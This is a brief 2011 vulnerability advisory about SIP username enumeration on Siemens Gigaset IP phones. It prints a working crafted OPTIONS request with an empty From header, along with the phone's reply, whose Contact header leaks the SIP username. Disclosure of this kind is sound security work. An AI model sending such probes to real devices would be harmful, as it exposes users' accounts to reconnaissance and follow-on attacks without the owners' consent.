Siemens Gigaset ip series sip username enumeration Author: francesco.tornieri \"At\" verona-wireless.net Summary: Sip responses permit user identification Release Date: 23/08/2011 Criticality level: Low Impact: Information leak Device: Siemens Gigaset IP series (Tested A580IP) Description: I've configured my own device in this way: ------------------------ Siemens Gigaset SIP Configuration Form ------------------------ IP: 192.168.1.253 Authentication Name: 500 Authentication Password: 500 Username: 500 Display Name: dect Authentication Name and Username field have to be the same otherwise the device doesn't registers to the PBX. It's possible to enumerate SIP username through use craft OPTIONS method, if you send an OPTIONS with a craft null "From" header (ex: From: ) you obtain in response a "Contact" header that contains phone's username SIP field (ex:Contact: ). ------------------------ Craft Sip OPTIONS example ------------------------ OPTIONS sip:@192.168.1.253:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.1.253:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport Max-Forwards: 70 From: ;tag=642d29cd-0671-e011-81a1-a1816009ca7a To: Call-ID: d168fe2114a87ab560886720ab19392c CSeq: 199 OPTIONS User-Agent: FT Content-Length: 0 Response: --- Received: SIP/2.0 200 OK Via: SIP/2.0/UDP 192.168.1.253:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport=36675;received=192.168.1.1 From: ;tag=642d29cd-0671-e011-81a1-a1816009ca7a To: ;tag=2470224496 Call-ID: 581bac10541a39c50df52ed2d88297ff CSeq: 199 OPTIONS Contact: <----- 500 SIP Username field ... --- Francesco Tornieri